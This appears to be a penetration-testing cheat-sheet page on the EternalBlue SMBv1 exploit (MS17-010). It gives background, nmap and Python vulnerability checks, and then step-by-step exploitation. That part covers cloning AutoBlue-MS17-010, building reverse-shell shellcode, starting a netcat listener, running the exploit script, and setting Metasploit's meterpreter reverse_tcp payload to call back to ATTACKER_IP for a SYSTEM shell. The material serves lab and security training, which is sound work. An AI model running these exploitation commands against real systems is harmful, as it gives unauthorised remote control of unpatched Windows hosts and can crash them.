EternalBlue
EternalBlue is the name of an exploit (developed by the NSA and leaked by the Shadow Brokers in April 2017) for a vulnerability in the Windows SMBv1 server, CVE-2017-0144, one of the SMB flaws fixed by Microsoft security bulletin MS17-010. A successful run gives an unauthenticated attacker remote code execution in the kernel, so the resulting shell runs as SYSTEM.
The bug is a buffer overflow in srv.sys, the kernel-mode SMBv1 driver, triggered while it converts the extended attribute (FEA) list of a Trans2 request; only hosts that still speak SMBv1 on TCP 445 are affected.
EternalBlue was used by the WannaCry (May 2017) and NotPetya (June 2017) ransomware to spread to other Windows systems across networks without any user interaction.
Microsoft released the patch in March 2017 (MS17-010, two months before WannaCry), but unpatched systems with SMBv1 enabled are still regularly found on internal networks.
Enumeration
# Confirm that SMB (TCP 445) is open and fingerprint the service and OS (-sS and -O need root)
sudo nmap -sS -sV -O -p 445 TARGET_IP
# List the SMB dialects offered; the MS17-010 check only applies if SMBv1 (NT LM 0.12) is enabled
nmap -p 445 --script=smb-protocols TARGET_IP
# Check whether the host is vulnerable to MS17-010 (look for "State: VULNERABLE" in the script output)
nmap -sV -p 445 --script=smb-vuln-ms17-010 TARGET_IP
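The nmap script above, and Metasploit's smb_ms17_010 scanner, both perform the same probe: negotiate SMBv1, open a null session to IPC$, and send a TRANS2 request with the SESSION_SETUP subcommand (0x000E). Unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched server rejects the call with a different status, and a host with SMBv1 disabled simply drops the connection. The script below is an added example that reproduces this check with raw sockets; it is not code from this page, from nmap or from Metasploit. The target address 192.0.2.10 is a placeholder, and the "patched" status set (STATUS_INVALID_PARAMETER, STATUS_ACCESS_DENIED) is the one the public scanners treat as not vulnerable. Nothing is exploited; only the status code of the reply is read.

```python
#!/usr/bin/env python3
"""Raw-SMBv1 MS17-010 check (added example; mirrors the nmap/Metasploit probe)."""
import socket
import struct
import sys

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE, SMB_COM_SESSION_SETUP_ANDX = 0x72, 0x73
SMB_COM_TREE_CONNECT_ANDX, SMB_COM_TRANSACTION2 = 0x75, 0x32
TRANS2_SESSION_SETUP = 0x000E
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205            # answer from an unpatched srv.sys
STATUS_PATCHED = {0xC000000D: "STATUS_INVALID_PARAMETER", 0xC0000022: "STATUS_ACCESS_DENIED"}


def nbss(smb):
    """Prefix an SMB message with the 4-byte NetBIOS Session Service header (type 0, 3-byte length)."""
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb


def smb_header(command, status=0, tid=0, uid=0):
    """32-byte SMBv1 header: Flags 0x18, Flags2 0x4001 (NT status codes, long names, ASCII, no ext. security)."""
    return struct.pack("<4sBIBH12sHHHH", SMB_MAGIC, command, status, 0x18, 0x4001,
                       b"\x00" * 12, tid, 0xFEFF, uid, 1)


def negotiate():
    """SMB_COM_NEGOTIATE offering only the NT LM 0.12 dialect (WordCount 0)."""
    dialects = b"\x02NT LM 0.12\x00"
    return nbss(smb_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(dialects)) + dialects)


def session_setup():
    """Null session (WordCount 13): one-byte ANSI password, empty account, domain, OS and LanMan strings."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 50, 0, 0, 1, 0, 0, 0x00000050)
    data = b"\x00" * 5
    return nbss(smb_header(SMB_COM_SESSION_SETUP_ANDX) + struct.pack("<B", 13) + words
                + struct.pack("<H", len(data)) + data)


def tree_connect(host, uid):
    """TREE_CONNECT_ANDX to \\\\host\\IPC$ (WordCount 4) with the UID the server issued."""
    data = b"\x00" + f"\\\\{host}\\IPC$".encode() + b"\x00" + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)
    return nbss(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + struct.pack("<B", 4) + words
                + struct.pack("<H", len(data)) + data)


def trans2_session_setup(tid, uid):
    """TRANS2 (WordCount 15): no parameters or data, SetupCount 1, Setup[0] = SESSION_SETUP; offsets = 65."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 65, 0, 65, 1, 0,
                        TRANS2_SESSION_SETUP)
    return nbss(smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + struct.pack("<B", 15) + words
                + struct.pack("<H", 0))


def nt_status(frame):
    """NT status of a received NBSS+SMB frame (SMB header offset 5, plus the 4-byte NBSS header)."""
    if len(frame) < 36 or frame[4:8] != SMB_MAGIC:
        raise ValueError("not an SMBv1 frame")
    return struct.unpack_from("<I", frame, 9)[0]


def classify(status):
    """Map the TRANS2 reply status onto the scanner verdict."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"
    if status in STATUS_PATCHED:
        return "patched"
    return "inconclusive"


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:                                  # server hung up: SMBv1 disabled or filtered
            raise ConnectionError("server closed the connection (SMBv1 disabled?)")
        buf += chunk
    return buf


def exchange(sock, frame):
    """Send one frame and read exactly one NBSS-framed reply."""
    sock.sendall(frame)
    head = recv_exact(sock, 4)
    return head + recv_exact(sock, struct.unpack(">I", b"\x00" + head[1:])[0])


def check(host, port=445, timeout=5.0):
    with socket.create_connection((host, port), timeout) as sock:
        exchange(sock, negotiate())
        resp = exchange(sock, session_setup())
        if nt_status(resp) != 0:
            return f"inconclusive (null session refused: 0x{nt_status(resp):08X})"
        uid = struct.unpack_from("<H", resp, 32)[0]  # UID: SMB offset 28 + 4
        resp = exchange(sock, tree_connect(host, uid))
        if nt_status(resp) != 0:
            return f"inconclusive (IPC$ refused: 0x{nt_status(resp):08X})"
        tid = struct.unpack_from("<H", resp, 28)[0]  # TID: SMB offset 24 + 4
        status = nt_status(exchange(sock, trans2_session_setup(tid, uid)))
        return f"{classify(status)} (0x{status:08X})"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"   # placeholder (TEST-NET-1)
    try:
        print(f"{target}: {check(target)}")
    except (OSError, ValueError) as exc:
        print(f"{target}: no SMBv1 answer ({exc})")
```

Run it as `python3 ms17010_check.py TARGET_IP` before touching an exploit: "vulnerable" means the TRANS2 probe got 0xC0000205, "patched" means the server rejected the subcommand, and "no SMBv1 answer" means the host dropped the connection at negotiate, in which case EternalBlue cannot apply regardless of patch level. Because the probe only reads a status code it is safe to run against production hosts, unlike the exploit itself, which can crash the target.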
Manual Exploitation
This can be done with AutoBlue-MS17-010, a wrapper around the public Python port of the exploit. It needs impacket for the exploit scripts and nasm plus msfvenom for shell_prep.sh, and the shellcode must match the target's architecture (sc_x64.bin for 64-bit targets, sc_x86.bin for 32-bit). A failed attempt can crash the target (blue screen), so only run it once the check above reports the host as vulnerable.
# Clone the repository https://github.com/3ndG4me/AutoBlue-MS17-010
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
# Generate the kernel shellcode plus a user-mode payload; the script asks for the architecture,
# a regular or meterpreter reverse shell, and the LHOST/LPORT to connect back to
cd shellcode
./shell_prep.sh
cd ..
# Set up a listener on the LPORT given to shell_prep.sh (use a meterpreter handler instead if you chose that payload)
nc -nvlp PORT
# Pick the exploit script for the target OS (eternalblue_exploit7.py: Windows 7 / Server 2008 R2,
# eternalblue_exploit8.py: Windows 8 / Server 2012) and the shellcode for its architecture
python3 eternalblue_exploit7.py TARGET_IP shellcode/sc_x64.bin
Metasploit Exploitation
search eternalblue
# Optional: the scanner module runs the same MS17-010 probe as the nmap script, without exploiting anything
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS TARGET_IP
run
# The exploit module; the payload must match the target architecture (x64 meterpreter shown)
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS TARGET_IP
set LHOST ATTACKER_IP
set LPORT PORT
# "check" confirms vulnerability first; "run" fires the exploit and may crash a target that is not actually vulnerable
check
run